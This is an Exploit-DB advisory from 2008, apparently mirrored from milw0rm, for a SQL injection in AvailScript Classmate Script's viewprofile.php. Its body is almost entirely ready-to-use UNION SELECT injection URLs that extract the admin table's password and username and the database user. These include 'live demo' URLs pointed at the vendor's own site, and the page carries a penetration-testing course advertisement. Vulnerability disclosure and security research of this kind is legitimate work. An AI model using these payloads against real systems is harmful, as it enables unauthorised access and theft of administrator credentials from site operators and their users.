AvailScript Classmate Script - 'viewprofile.php' SQL Injection

EDB-ID:

6412


Author:

Stack

Type:

webapps


Platform:

PHP

Date:

2008-09-09


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

Availscript Classmate Script Remote SQL Injection Vulnerability
home script : http://www.availscript.com/classmate_script.php
By : Stack
befor execute exploit you need to register
exploit
site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
site.il/script/viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17--
live demo
username
http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16,17+from+admin--
http://www.availscript.com/classmate/viewprofile.php?p=-1%20union%20select%201,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17--

# milw0rm.com [2008-09-09]